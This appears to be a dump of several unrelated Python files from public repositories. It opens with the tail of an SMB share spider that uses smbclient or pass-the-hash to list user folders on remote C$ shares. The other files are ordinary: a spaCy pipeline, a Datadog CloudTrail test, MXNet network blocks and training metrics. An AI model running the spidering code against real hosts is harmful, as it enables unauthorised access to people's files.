\"ls Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)).split() if self.check_errors(result[-1]): return "error" if "NT_STATUS_OBJECT_NAME_NOT_FOUND" in result: return "old" else: return "new" def find_users(self, result): result = result.split('\n') purge = [] users = [] for num in range(0,len(result)): # cleans some stuff up a bit. if " . " in result[num] or " .. " in result[num] or "Domain=" in result[num]\ or len(result[num]) < 2 or "blocks of size" in result[num]: purge.append(num) purge = sorted(purge, reverse=True) for i in purge: del result[i] #clean up users list a little bit for i in result: user = i[:i.find(" D")] user = user[2:user.rfind(re.sub(r'\W+', '', user)[-1])+1] users.append(user) return users def check_errors(self, result): access_error = { "UNREACHABLE":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host, "UNSUCCESSFUL":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host, "TIMEOUT":" [-] Error [%s]: Check to ensure that host is online and that share is accessible." % self.smb_host, "LOGON_SERVER":" [-] Error %s Cannot contact logon server. Skipping host." % self.smb_host } for err in access_error: if err in result: print colors.red + access_error[err] + colors.norm self.skip_host = self.smb_host return True if "LOGON_FAIL" in result.split()[-1] and not self.ignorecheck: print colors.red + " [-] " + colors.norm + "Error [%s]: Invalid credentials. Please correct credentials and try again." % self.smb_host exit() elif "ACCESS_DENIED" in result.split()[-1]: print colors.red + " [-] " + colors.norm + "Error [%s]: Valid credentials, but no access. Try another account." % self.smb_host elif "BAD_NETWORK" in result.split()[-1] or "CONNECTION_REFUSED" in result.split()[-1]: print colors.red + " [-] " + colors.norm + "Error: Invalid share -> smb://%s/%s" % (self.smb_host,self.smb_share) return True def smbclient(self): if self.pth: return "pth-smbclient" else: return "smbclient" def spider_host(self): if self.smb_share.lower() == "profile": self.smb_share = "C$" self.profile = True if self.fingerprint_fs() == "error": return elif self.fingerprint_fs() == "old": folders = ['My Documents','Desktop','Documents'] result = commands.getoutput("%s -c \"ls \\\"Documents and Settings\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)) if self.check_errors(result): return users = self.find_users(result) for user in users: for folder in folders: result = commands.getoutput("%s -c \"recurse;ls \\\"Documents and Settings\\%s\\%s\" //%s/C$ -U %s"\ % (self.smbclient(), user, folder, self.smb_host, self.credentials)) self.parse_result(result) else: folders = ['Documents','Desktop','Music','Videos','Downloads','Pictures'] result = commands.getoutput("%s -c \"ls \\\"Users\\*\" //%s/C$ -U %s" % (self.smbclient(), self.smb_host, self.credentials)) if self.check_errors(result): return users = self.find_users(result) for user in users: for folder in folders: result = commands.getoutput("%s -c \"recurse;ls \\\"Users\\%s\\%s\" //%s/C$ -U %s" % (self.smbclient(), user, folder, self.smb_host, self.credentials)) self.parse_result(result) else: result = commands.getoutput("%s -c \"recurse;ls\" \"//%s/%s\" -U %s" % (self.smbclient(), self.smb_host, self.smb_share, self.credentials)) if self.check_errors(result): return self.parse_result(result) if __name__ == "__main__": try: start(argv[1:]) except KeyboardInterrupt: print "\nExiting. Interrupted by user (ctrl-c)." exit() except Exception, err: print err exit() print "\n-----" print "Completed in: %.1fs" % (time.time() - start_time)
2.90625
3
api-inference-community/docker_images/spacy/app/pipelines/text_classification.py
mlonaws/huggingface_hub
362
16792
<filename>api-inference-community/docker_images/spacy/app/pipelines/text_classification.py<gh_stars>100-1000 import os import subprocess import sys from typing import Dict, List from app.pipelines import Pipeline class TextClassificationPipeline(Pipeline): def __init__( self, model_id: str, ): # At the time, only public models from spaCy are allowed in the inference API. full_model_path = model_id.split("/") if len(full_model_path) != 2: raise ValueError( f"Invalid model_id: {model_id}. It should have a namespace (:namespace:/:model_name:)" ) namespace, model_name = full_model_path package = f"https://huggingface.co/{namespace}/{model_name}/resolve/main/{model_name}-any-py3-none-any.whl" cache_dir = os.environ["PIP_CACHE"] subprocess.check_call( [sys.executable, "-m", "pip", "install", "--cache-dir", cache_dir, package] ) import spacy self.model = spacy.load(model_name) def __call__(self, inputs: str) -> List[List[Dict[str, float]]]: """ Args: inputs (:obj:`str`): a string containing some text Return: A :obj:`list`:. The object returned should be a list of one list like [[{"label": 0.9939950108528137}]] containing : - "label": A string representing what the label/class is. There can be multiple labels. - "score": A score between 0 and 1 describing how confident the model is for this label/class. """ doc = self.model(inputs) categories = [] for cat, score in doc.cats.items(): categories.append({"label": cat, "score": score}) return [categories]
2.625
3
aws/logs_monitoring/tests/test_cloudtrail_s3.py
rkitron/datadog-serverless-functions
232
16793
<filename>aws/logs_monitoring/tests/test_cloudtrail_s3.py from unittest.mock import MagicMock, patch import os import sys import unittest import json import copy import io import gzip sys.modules["trace_forwarder.connection"] = MagicMock() sys.modules["datadog_lambda.wrapper"] = MagicMock() sys.modules["datadog_lambda.metric"] = MagicMock() sys.modules["datadog"] = MagicMock() sys.modules["requests"] = MagicMock() sys.modules["requests_futures.sessions"] = MagicMock() env_patch = patch.dict( os.environ, { "DD_API_KEY": "11111111111111111111111111111111", "DD_ADDITIONAL_TARGET_LAMBDAS": "ironmaiden,megadeth", }, ) env_patch.start() import lambda_function import parsing env_patch.stop() class Context: function_version = 0 invoked_function_arn = "invoked_function_arn" function_name = "function_name" memory_limit_in_mb = "10" test_data = { "Records": [ { "eventVersion": "1.08", "userIdentity": { "type": "AssumedRole", "principalId": "AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration", "arn": "arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d", "accountId": "601427279990", "accessKeyId": "ASIAYYB64AB3DWOY7JNT", "sessionContext": { "sessionIssuer": { "type": "Role", "principalId": "AROAYYB64AB3HGPQO2EPR", "arn": "arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole", "accountId": "601427279990", "userName": "Siti_DatadogAWSIntegrationRole", }, "attributes": { "creationDate": "2021-05-02T23:49:01Z", "mfaAuthenticated": "false", }, }, }, "eventTime": "2021-05-02T23:53:28Z", "eventSource": "dynamodb.amazonaws.com", "eventName": "DescribeTable", "awsRegion": "us-east-1", "sourceIPAddress": "172.16.31.10", "userAgent": "Datadog", "requestParameters": {"tableName": "KinesisClientLibraryLocal"}, "responseElements": None, "requestID": "A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG", "eventID": "a5dd11f9-f616-4ea8-8030-0b3eef554352", "readOnly": True, "resources": [ { "accountId": "601427279990", "type": "AWS::DynamoDB::Table", "ARN": "arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal", } ], "eventType": "AwsApiCall", "apiVersion": "2012-08-10", "managementEvent": True, "recipientAccountId": "601427279990", "eventCategory": "Management", } ] } def test_data_gzipped() -> io.BytesIO: return io.BytesIO( gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8")) ) class TestS3CloudwatchParsing(unittest.TestCase): def setUp(self): self.maxDiff = 9000 @patch("parsing.boto3") @patch("lambda_function.boto3") def test_s3_cloudtrail_pasing_and_enrichment(self, lambda_boto3, parsing_boto3): context = Context() boto3 = parsing_boto3.client() boto3.get_object.return_value = {"Body": test_data_gzipped()} payload = { "s3": { "bucket": { "name": "test-bucket", }, "object": { "key": "<KEY>" }, } } result = parsing.parse({"Records": [payload]}, context) expected = copy.deepcopy([test_data["Records"][0]]) expected[0].update( { "ddsource": "cloudtrail", "ddsourcecategory": "aws", "service": "cloudtrail", "aws": { "s3": { "bucket": payload["s3"]["bucket"]["name"], "key": payload["s3"]["object"]["key"], }, "function_version": context.function_version, "invoked_function_arn": context.invoked_function_arn, }, } ) # yeah, there are tags, but we don't care to compare them result[0].pop("ddtags") # expected parsed result, now testing enrichment self.assertEqual(expected[0], result[0]) expected[0]["host"] = "i-08014e4f62ccf762d" self.assertEqual(expected[0], lambda_function.enrich(result)[0]) if __name__ == "__main__": unittest.main()
1.945313
2
ch_06/tests/test_lookup_mapping.py
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
43
16794
<reponame>real-slim-chadi/Python-Object-Oriented-Programming---4th-edition """ Python 3 Object-Oriented Programming Chapter 6, Abstract Base Classes and Operator Overloading """ from lookup_mapping import Lookup def test_lookup_mapping(): x = Lookup( [ ["z", "Zillah"], ["a", "Amy"], ["c", "Clara"], ["b", "Basil"], ] ) assert "a" in x assert "d" not in x assert len(x) == 4 assert x["a"] == "Amy" assert x["z"] == "Zillah" assert list(x) == ["a", "b", "c", "z"]
3.234375
3
serempre_todo/utils/choices.py
pygabo/Serempre
0
16795
<gh_stars>0 TASK_STATUS = [ ('TD', 'To Do'), ('IP', 'In Progress'), ('QA', 'Testing'), ('DO', 'Done'), ] TASK_PRIORITY = [ ('ME', 'Medium'), ('HI', 'Highest'), ('HG', 'High'), ('LO', 'Lowest'), ]
1.671875
2
symbols/block.py
zerofo/sdu-face-alignment
192
16796
from __future__ import absolute_import from __future__ import division from __future__ import print_function import mxnet as mx import numpy as np from config import config def Conv(**kwargs): body = mx.sym.Convolution(**kwargs) return body def Act(data, act_type, name): if act_type=='prelu': body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name) else: body = mx.symbol.Activation(data=data, act_type=act_type, name=name) return body def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''): bn_mom = config.bn_mom workspace = config.workspace if not dcn: conv = mx.symbol.Convolution( data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv') else: conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data, num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset, num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False) bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn') if with_act: act = Act(bn, act_type, name=name+'_relu') #act = mx.symbol.Activation( # data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu') return act else: return bn def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs): bit = 1 ACT_BIT = config.ACT_BIT bn_mom = config.bn_mom workspace = config.workspace memonger = config.memonger #print('in unit2') # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1') if not binarize: act1 = Act(data=bn1, act_type='relu', name=name + '_relu1') conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True, workspace=workspace, name=name + '_conv1') else: act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True) conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit) bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2') if not binarize: act2 = Act(data=bn2, act_type='relu', name=name + '_relu2') conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1), no_bias=True, workspace=workspace, name=name + '_conv2') else: act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True) conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1), no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit) bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3') if not binarize: act3 = Act(data=bn3, act_type='relu', name=name + '_relu3') conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True, workspace=workspace, name=name + '_conv3') else: act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True) conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit) #if binarize: # conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4') if dim_match: shortcut = data else: if not binarize: shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True, workspace=workspace, name=name+'_sc') else: shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit) if memonger: shortcut._set_attr(mirror_stage='True') return conv3 + shortcut def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs): bit = 1 ACT_BIT = config.ACT_BIT bn_mom = config.bn_mom workspace = config.workspace memonger = config.memonger #print('in unit2') # the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1') if not binarize: act1 = Act(data=bn1, act_type='relu', name=name + '_relu1') if not dcn: conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation), no_bias=True, workspace=workspace, name=name + '_conv1') else: conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1, num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset, num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True) else: act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True) conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1), no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit) bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2') if not binarize: act2 = Act(data=bn2, act_type='relu', name=name + '_relu2') if not dcn: conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation), no_bias=True, workspace=workspace, name=name + '_conv2') else: conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2, num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset, num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True) else: act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True) conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1), no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit) bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3') if not binarize: act3 = Act(data=bn3, act_type='relu', name=name + '_relu3') if not dcn: conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation), no_bias=True, workspace=workspace, name=name + '_conv3') else: conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3, num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset, num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True) else: act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True) conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1), no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit) conv4 = mx.symbol.Concat(*[conv1, conv2, conv3]) if binarize: conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4') if dim_match: shortcut = data else: if not binarize: shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True, workspace=workspace, name=name+'_sc') else: #assert(False) shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0), no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit) shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn') if memonger: shortcut._set_attr(mirror_stage='True') return conv4 + shortcut #return bn4 + shortcut #return act4 + shortcut def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''): tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv') tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0') tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1') tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2') tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2]) tower_out = ConvFactory( tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out') net = net+scale * tower_out if with_act: act = mx.symbol.Activation( data=net, act_type=act_type, attr=mirror_attr) return act else: return net def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''): M = 1.0 tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv') tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0') tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1') tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0') tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1') tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2') tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2]) tower_out = ConvFactory( tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out') net = net+scale * tower_out if with_act: act = mx.symbol.Activation( data=net, act_type=act_type, attr=mirror_attr) return act else: return net def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs): assert not binarize if stride[0]>1 or not dim_match: return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs) conv4 = block35(data, num_filter, name=name+'_block35') return conv4 def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs): workspace = config.workspace if stride[0]>1 or not dim_match: return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs) cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1) return cab.get() def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate): if config.net_block=='resnet': return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate) elif config.net_block=='inception': return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate) elif config.net_block=='hpm': return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate) elif config.net_block=='cab': return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate) #def lin(data, num_filter, workspace, name, binarize, dcn): # bit = 1 # ACT_BIT = config.ACT_BIT # bn_mom = config.bn_mom # workspace = config.workspace # if not binarize: # if not dcn: # conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), # no_bias=True, workspace=workspace, name=name + '_conv') # bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # return act1 # else: # bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1, # num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1)) # conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset, # num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False) # #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1), # # no_bias=False, workspace=workspace, name=name + '_conv') # return conv1 # else: # bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') # act1 = Act(data=bn1, act_type='relu', name=name + '_relu') # conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), # no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit) # conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2') # return conv1 def lin3(data, num_filter, workspace, name, k, g=1, d=1): bn_mom = config.bn_mom workspace = config.workspace if k!=3: conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g, no_bias=True, workspace=workspace, name=name + '_conv') else: conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d), no_bias=True, workspace=workspace, name=name + '_conv') bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn') act1 = Act(data=bn1, act_type='relu', name=name + '_relu') ret = act1 return ret class CAB: def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group): self.data = data self.nFilters = nFilters self.nModules = nModules self.n = n self.workspace = workspace self.name = name self.dilate = dilate self.group = group self.sym_map = {} def get_output(self, w, h): key = (w, h) if key in self.sym_map: return self.sym_map[key] ret = None if h==self.n: if w==self.n: ret = (self.data, self.nFilters) else: x = self.get_output(w+1, h) f = int(x[1]*0.5) if w!=self.n-1: body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1) else: body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate) ret = (body,f) else: x = self.get_output(w+1, h+1) y = self.get_output(w, h+1) if h%2==1 and h!=w: xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1]) #xbody = xbody+x[0] else: xbody = x[0] #xbody = x[0] #xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1]) if w==0: ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group) else: ybody = y[0] ybody = mx.sym.concat(y[0], ybody, dim=1) body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h)) body = body/2 ret = (body, x[1]) self.sym_map[key] = ret return ret def get(self): return self.get_output(1, 1)[0]
2.171875
2
train/metric.py
alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates
54
16797
''' --- I M P O R T S T A T E M E N T S --- ''' import coloredlogs, logging coloredlogs.install() import numpy as np ''' === S T A R T O F C L A S S E V A L M E T R I C === [About] Object class for calculating average values. [Init Args] - name: String for the variable name to calculate average value for. [Methods] - __init__ : Class initialiser - update : Function to be implemented by the children sub-classes. - reset : Function for resetting the number of instances and the sum of the metric. - get : Calculation of the average value based on the number of instances and the provided sum. - get_name_value : Function for returning the name(s) and the value(s). - check_label_shapes : Function responsible for type and shape checking. ''' class EvalMetric(object): def __init__(self, name, **kwargs): self.name = str(name) self.reset() def update(self, preds, labels, losses, lr, batch_size): raise NotImplementedError('Must be implemented in child classes!') def reset(self): self.num_inst = 0 self.sum_metric = 0.0 def get(self): # case that instances are 0 -> return NaN if self.num_inst == 0: return (self.name, float('nan')) # case that instances are 1 -> return their sum if self.num_inst == 1: return(self.name, self.sum_metric) # case that instances are >1 -> return average else: return (self.name, self.sum_metric / self.num_inst) def get_name_value(self): name, value = self.get() if not isinstance(name, list): name = [name] if not isinstance(value, list): value = [value] return list(zip(name, value)) def check_label_shapes(self, preds, labels): # raise if the shape is inconsistent if (type(labels) is list) and (type(preds) is list): label_shape, pred_shape = len(labels), len(preds) else: label_shape, pred_shape = labels.shape[0], preds.shape[0] if label_shape != pred_shape: raise NotImplementedError("") ''' === E N D O F C L A S S E V A L M E T R I C === ''' ''' === S T A R T O F C L A S S M E T R I C L I S T === [About] EvalMetric class for creating a list containing Evalmetric objects. [Init Args] - name: String for the variable name. [Methods] - __init__ : Class initialiser - update : Function to update the list of EvalMetric objects. - reset : Function for resetting the list. - get : Function for getting each of the EvalMetric objects in the list. - get_name_value : Function for getting the name of the list items. ''' class MetricList(EvalMetric): def __init__(self, *args, name="metric_list"): assert all([issubclass(type(x), EvalMetric) for x in args]), \ "MetricList input is illegal: {}".format(args) self.metrics = [metric for metric in args] super(MetricList, self).__init__(name=name) def update(self, preds, labels, losses=None, lr=None, batch_size=None): preds = [preds] if type(preds) is not list else preds labels = [labels] if type(labels) is not list else labels losses = [losses] if type(losses) is not list else losses lr = [lr] if type(lr) is not list else lr batch_size = [batch_size] if type(batch_size) is not list else batch_size for metric in self.metrics: metric.update(preds, labels, losses, lr, batch_size) def reset(self): if hasattr(self, 'metrics'): for metric in self.metrics: metric.reset() else: logging.warning("No metric defined.") def get(self): ouputs = [] for metric in self.metrics: ouputs.append(metric.get()) return ouputs def get_name_value(self): ouputs = [] for metric in self.metrics: ouputs.append(metric.get_name_value()) return ouputs ''' === E N D O F C L A S S M E T R I C L I S T === ''' ''' === S T A R T O F C L A S S A C C U R A C Y === [About] EvalMetric class for creating an accuracy estimate. [Init Args] - name: String for the variable name. Defaults to `accuracy`. - topk: Number of top predictions to be used of the score (top-1, top-5 etc.). Defaults to 1. [Methods] - __init__ : Class initialiser - update : Function to update scores. ''' class Accuracy(EvalMetric): def __init__(self, name='accuracy', topk=1): super(Accuracy, self).__init__(name) self.topk = topk def update(self, preds, labels, losses, lr, batch_size): preds = [preds] if type(preds) is not list else preds labels = [labels] if type(labels) is not list else labels self.check_label_shapes(preds, labels) for pred, label in zip(preds, labels): assert self.topk <= pred.shape[1], \ "topk({}) should no larger than the pred dim({})".format(self.topk, pred.shape[1]) _, pred_topk = pred.topk(self.topk, 1, True, True) pred_topk = pred_topk.t() correct = pred_topk.eq(label.view(1, -1).expand_as(pred_topk)) self.sum_metric += float(correct.reshape(-1).float().sum(0, keepdim=True).numpy()) self.num_inst += label.shape[0] ''' === E N D O F C L A S S A C C U R A C Y === ''' ''' === S T A R T O F C L A S S L O S S === [About] EvalMetric class for creating a loss score. The class acts a a `dummy estimate` as no further calculations are required for the loss. Instead it is primarily used to easily/directly print the loss. [Init Args] - name: String for the variable name. Defaults to `loss`. [Methods] - __init__ : Class initialiser - update : Function to update scores. ''' class Loss(EvalMetric): def __init__(self, name='loss'): super(Loss, self).__init__(name) def update(self, preds, labels, losses, lr, batch_size): assert losses is not None, "Loss undefined." for loss in losses: self.sum_metric += float(loss.numpy().sum()) self.num_inst += 1 ''' === E N D O F C L A S S L O S S === ''' ''' === S T A R T O F C L A S S L O S S === [About] EvalMetric class for batch-size used. The class acts a a `dummy estimate` as no further calculations are required for the size of the batch. Instead it is primarily used to easily/directly print the batch size. [Init Args] - name: String for the variable name. Defaults to `batch-size`. [Methods] - __init__ : Class initialiser - update : Function used for updates. ''' class BatchSize(EvalMetric): def __init__(self, name='batch-size'): super(BatchSize, self).__init__(name) def update(self, preds, labels, losses, lrs, batch_sizes): assert batch_sizes is not None, "Batch size undefined." self.sum_metric = batch_sizes self.num_inst = 1 ''' === E N D O F C L A S S L O S S === ''' ''' === S T A R T O F C L A S S L E A R N I N G R A T E === [About] EvalMetric class for learning rate used. The class acts a a `dummy estimate` as no further calculations are required for the size of the lr. Instead it is primarily used to easily/directly print the learning rate. [Init Args] - name: String for the variable name. Defaults to `lr`. [Methods] - __init__ : Class initialiser - update : Function used for updates. ''' class LearningRate(EvalMetric): def __init__(self, name='lr'): super(LearningRate, self).__init__(name) def update(self, preds, labels, losses, lrs, batch_sizes): assert lrs is not None, "Learning rate undefined." self.sum_metric = lrs[-1] self.num_inst = 1 ''' === E N D O F C L A S S L E A R N I N G R A T E === ''' if __name__ == "__main__": import torch # Test Accuracy predicts = [torch.from_numpy(np.array([[0.7, 0.3], [0, 1.], [0.4, 0.6]]))] labels = [torch.from_numpy(np.array([ 0, 1, 1 ]))] losses = [torch.from_numpy(np.array([ 0.3, 0.4, 0.5 ]))] logging.getLogger().setLevel(logging.DEBUG) logging.debug("input 